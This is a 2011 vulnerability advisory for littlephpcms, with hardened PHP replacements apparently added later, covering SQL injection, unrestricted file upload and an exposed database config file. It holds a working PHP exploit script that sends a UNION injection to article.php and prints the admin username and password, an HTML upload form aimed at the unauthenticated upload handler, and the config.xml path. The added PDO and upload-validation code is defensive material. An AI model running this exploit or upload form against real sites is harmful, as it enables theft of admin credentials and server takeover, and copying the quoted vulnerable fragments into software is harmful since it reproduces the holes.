Title: littlephpcms multiple SQL injection, file upload and information disclosure vulnerabilities
Time: 2011-09-20
Team: makebugs
Author: 黑小子

The following is a quoted fragment:

// pageArt.php

  // ... omitted
  $column = $_POST["column"];
  $rownum = $_POST["rownum"];
  // $column is concatenated straight into the query without validation or escaping
  $sql = " select id,title,addtime from lpc_article where column_id=".$column;
  // ... omitted
 Other similar files are omitted.
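As an added example (not littlephpcms code), here is a hardened replacement for the pageArt.php fragment above. It keeps the same table and columns (lpc_article, column_id, id, title, addtime) but validates the POST values and binds them as typed parameters; it assumes an existing PDO connection in $pdo, which the page does not show.

```php
<?php
// Added example, not the project's own code: a parameterized version of
// the pageArt.php query. $pdo is assumed to be an already-open PDO handle.

function fetch_articles(PDO $pdo, array $post): array
{
    // column_id must be a positive integer; anything else is rejected
    // before it gets anywhere near the query.
    $column = filter_var($post['column'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($column === false) {
        throw new InvalidArgumentException('invalid column id');
    }

    // rownum drives a LIMIT; clamp it to a sane range instead of trusting it.
    $rownum = filter_var($post['rownum'] ?? 20, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($rownum === false) {
        $rownum = 20;
    }

    // Placeholders are bound with an explicit type, so a value such as
    // "255 and 1=2 union select ..." can no longer alter the statement.
    $stmt = $pdo->prepare(
        'SELECT id, title, addtime FROM lpc_article WHERE column_id = :column LIMIT :rownum'
    );
    $stmt->bindValue(':column', $column, PDO::PARAM_INT);
    $stmt->bindValue(':rownum', $rownum, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage in pageArt.php (connection details are assumed, the page shows none):
// $pdo = new PDO('mysql:host=localhost;dbname=lpc;charset=utf8mb4', $user, $pass,
//     [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// $rows = fetch_articles($pdo, $_POST);
```

Turning off emulated prepares makes MySQL itself enforce the separation between query text and data; with it on, PDO still escapes bound values, but real server-side prepares are the simpler guarantee. The same pattern applies to the "other similar files" the advisory mentions: every place a request value meets SQL should go through a bound parameter.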

Exp:

<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
Sql injection Vul Exploit

 Exp :黑小子 cfking
Home: www.heixiaozi.com www.webvul.com
2011.09.20
+---------------------------------------------------------------------+
');

// both host and path are required, so fewer than 3 argv entries is a usage error
if ($argc < 3) {
print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].'  www.heixiaozi.com test
');
die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /article.php?id=255%20and%201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
     $headers .= "$str\n";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'cfkings90sec') !== false) {
preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
$result=explode("-",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");

}
else{
print_r("Exploit Failed! \n");
}
?>

File upload:

Vulnerable files:

admin/column/upload.php
admin/article/upload.php

The following is a quoted fragment:

Code:

$upload_dir = '../../uploads/';
$file_path = $upload_dir . $_FILES['myfile']['name'];
$MAX_SIZE = 20000000;
echo $_POST['buttoninfo'];
......

if($_FILES['myfile']['size']>$MAX_SIZE)
    echo "上传的文件大小超过了规定大小";

if($_FILES['myfile']['size'] == 0)
    echo "请选择上传的文件";

if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path))
    echo "复制文件失败,请重新上传";

Neither file applies any restriction at all: no authentication, no file-type check, and the client-supplied filename is written directly under uploads/.

Exp:

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form enctype="multipart/form-data" action="http://localhost/admin/column/upload.php" method="post">
<p>上传后网站跟目录/uploads/你上传的文件名</p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>
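As an added example (not littlephpcms code), the following is a hardened replacement for the admin/column/upload.php and admin/article/upload.php handlers quoted above. It keeps the original uploads directory and the myfile field name; require_admin() is a hypothetical session check that the original handler lacks, and the allow-list of image types is an assumption about what the CMS needs to accept.

```php
<?php
// Added example, not the project's own code: a restricted upload handler.
// Assumptions: uploads live in ../../uploads/ as in the original, the web
// server is configured not to execute scripts from that directory, and
// require_admin() is a hypothetical helper (the original has no auth check).

const UPLOAD_DIR = __DIR__ . '/../../uploads/';
const MAX_SIZE   = 2 * 1024 * 1024;           // 2 MiB, far below the original 20000000
const ALLOWED    = [                          // extension => MIME type the bytes must match
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

function require_admin(): void
{
    // Hypothetical check; adapt to the CMS's real session layout.
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('forbidden');
    }
}

function handle_upload(array $file): string
{
    require_admin();

    // PHP reports transport problems here; check it before touching tmp_name.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or no file selected');
    }
    if ($file['size'] > MAX_SIZE) {
        throw new RuntimeException('file too large');
    }

    // Accept only extensions from the fixed allow-list, then confirm the
    // extension against the content that was actually received.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }

    // The client-supplied name never reaches the filesystem: a random name
    // removes path traversal and attacker-chosen script names in one step.
    $target = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;

    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return basename($target);
}

// Usage: $stored = handle_upload($_FILES['myfile'] ?? []);
```

The filename is the important part: the original handler's only "check" is the size comparison, and even that just echoes a message and still moves the file. Validating the content with finfo catches renamed files, and serving uploads/ from a location where the server never executes PHP is what limits the damage when a check is bypassed. The same reasoning covers the config.xml disclosure noted next: files the web server never needs to serve, such as database configuration, belong outside the document root or behind an explicit deny rule.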

Information disclosure (the database configuration is reachable without authentication):

http://localhost/admin/lib/db/config.xml